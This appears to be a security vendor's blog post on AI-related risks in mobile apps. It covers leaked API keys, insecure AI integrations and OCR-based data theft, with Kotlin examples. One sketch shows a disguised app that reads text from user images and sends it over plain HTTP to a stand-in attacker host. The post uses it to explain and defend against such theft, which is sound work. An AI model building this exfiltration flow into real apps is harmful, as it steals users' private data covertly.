Visitors to the App Store and Google Play find it hard to escape artificial intelligence (AI). From photo enhancement apps to voice assistants to health diagnostics, AI has an undeniable presence in mobile apps. In fact, 10 of the 12 top graphic design apps use AI.

As AI permeates mobile apps, it introduces a new wave of security, privacy and compliance risks that developers, security leaders and businesses must understand and address. Misinformation, hallucinations and ethical bias stemming from AI models have long concerned companies, but now security, privacy and regulatory compliance issues threaten businesses as well.
NowSecure research recently discovered multiple security and privacy vulnerabilities in the iOS version of DeepSeek. Carlos Holguera, the OWASP Mobile Application Security (MAS) Project lead and a NowSecure principal research engineer, recently presented a Tech Talk about the risks AI introduces in mobile apps and the steps organizations can take to reduce them.
Watch the Tech Talk, “AI in Mobile Apps: Hidden Risks, Compliance Pitfalls and How to Mitigate Them,” for a deeper understanding of AI risks and how different roles in an organization face unique concerns about its usage. Potential business risks include:
- Violations of data privacy laws
- Regulatory and transparency requirements
- Cross-border data transfer restrictions
- AI security and data leakage risks
- Liability for model outcomes
- Model theft and repackaging
- Unauthorized use of AI models and API keys
- Integrity of model outcomes and cheating risks
AI Detection
The business risks outlined above stem from AI vulnerabilities such as unencrypted connections, hardcoded API keys, model theft and reverse engineering, and insecure AI integrations.
In the Tech Talk, Holguera shows how automated mobile application security testing with NowSecure Platform provides much-needed transparency, detecting cases such as an app that leaks an OpenAI API key and another that calls several AI services, including OpenAI, Google, DeepSeek and Moonshot AI.
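To make the first case concrete, here is a minimal Kotlin sketch of the anti-pattern behind a leaked key. The key value and class name are made-up placeholders, but any literal compiled into the app like this can be recovered by decompiling the binary or simply running strings over it:

```kotlin
// Anti-pattern: a provider API key embedded as a string constant ships with
// every copy of the app and can be pulled out of the compiled binary.
object OpenAiClient {
    // Placeholder value -- shipping any literal like this is the vulnerability.
    private const val API_KEY = "sk-EXAMPLE00000000000000000000"

    // Every request built this way carries the extractable secret.
    fun authHeader(): Pair<String, String> =
        "Authorization" to "Bearer $API_KEY"
}
```

Scanners flag string constants that match known key formats (OpenAI secret keys begin with `sk-`), which is how automated testing surfaces this class of leak before an attacker does.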
Holguera also discussed how the SparkCat malware uses optical character recognition (OCR) to steal cryptocurrency wallet data. He demonstrated a similar case with a demo app and a “malicious” server he created: the app behaves like a regular messaging app, but behind the scenes it uses ML models with OCR to read text from user images in the app’s external storage and transmits that data over unencrypted connections, allowing an attacker to intercept sensitive information such as account recovery codes.
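To show what that pattern looks like in code, here is a condensed Kotlin sketch of the flow the demo app illustrates, assuming Google’s ML Kit for on-device OCR; the server host is hypothetical, and the point is the insecure transport, not the recognition step:

```kotlin
import android.content.Context
import android.net.Uri
import com.google.mlkit.vision.common.InputImage
import com.google.mlkit.vision.text.TextRecognition
import com.google.mlkit.vision.text.latin.TextRecognizerOptions
import java.net.HttpURLConnection
import java.net.URL

// Condensed sketch of the malicious flow: on-device OCR over a user image,
// then exfiltration over plain HTTP that any on-path attacker can read.
fun ocrAndLeak(context: Context, imageUri: Uri) {
    val recognizer = TextRecognition.getClient(TextRecognizerOptions.DEFAULT_OPTIONS)
    val image = InputImage.fromFilePath(context, imageUri)
    recognizer.process(image)
        .addOnSuccessListener { visionText ->
            Thread {
                // http:// (not https://) is the core defect: recovered text such
                // as account recovery codes travels in cleartext. The host is
                // hypothetical. On modern Android this also requires
                // usesCleartextTraffic="true" in the manifest, itself a red flag
                // that scanners key on.
                val conn = URL("http://attacker.example/collect")
                    .openConnection() as HttpURLConnection
                conn.requestMethod = "POST"
                conn.doOutput = true
                conn.outputStream.use { it.write(visionText.text.toByteArray()) }
                conn.responseCode // fire the request
                conn.disconnect()
            }.start()
        }
}
```

Because the POST travels over cleartext HTTP, anyone on the network path can read the OCR output, which is exactly the interception Holguera demonstrates.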
Best Practices for Securing AI-Powered Apps
Full visibility into AI dependencies, libraries and data flows is critical. Leaders should take the following steps to protect apps:
- Track AI Endpoints and Jurisdiction: Know which AI endpoints the app uses and where they are hosted to ensure compliance with data residency regulations.
- Identify Local Files, Models and AI Libraries: Test mobile apps for local AI models, ensuring they’re secure and tamperproof.
- Secure API Keys and Sensitive Data Transmission: Use strong encryption and secure storage practices to protect API keys and sensitive data, as shown in the sketch after this list.
- Use OWASP Standards: Test apps against the OWASP MASVS industry standard to cover privacy, resilience, network, cryptography, authentication, storage and code quality risks beyond those associated with AI in mobile apps.
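One way to act on the API key guidance above is to keep provider keys off the device entirely: the app exchanges its session for a short-lived token from your own backend over a pinned TLS connection, and the backend holds the real provider key. A minimal Kotlin sketch, assuming OkHttp; the host, endpoint and pin hash are placeholders:

```kotlin
import okhttp3.CertificatePinner
import okhttp3.OkHttpClient
import okhttp3.Request

// Instead of shipping a provider API key in the binary, ask your own backend
// (which holds the real key) for a short-lived token over pinned TLS.
private val client = OkHttpClient.Builder()
    .certificatePinner(
        CertificatePinner.Builder()
            // Pin the backend's public key so a rogue CA certificate
            // cannot be used to intercept the exchange.
            .add("api.example.com", "sha256/REPLACE_WITH_REAL_PIN_BASE64=")
            .build()
    )
    .build()

fun fetchShortLivedAiToken(): String {
    val request = Request.Builder()
        .url("https://api.example.com/v1/ai-token") // hypothetical endpoint
        .build()
    client.newCall(request).execute().use { response ->
        check(response.isSuccessful) { "Token request failed: ${response.code}" }
        return response.body!!.string()
    }
}
```

Certificate pinning limits who can terminate the TLS connection, and keeping the real provider key server-side means repackaged or decompiled copies of the app have nothing to steal, addressing the model theft and unauthorized key use risks listed earlier.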
Act Against AI Risks in Your Apps
Watch the Tech Talk for deeper insight into the AI risks explored here, then discover how NowSecure can help you identify hidden AI integrations and hardcoded secrets and ensure compliance. Test your app for AI dependencies today.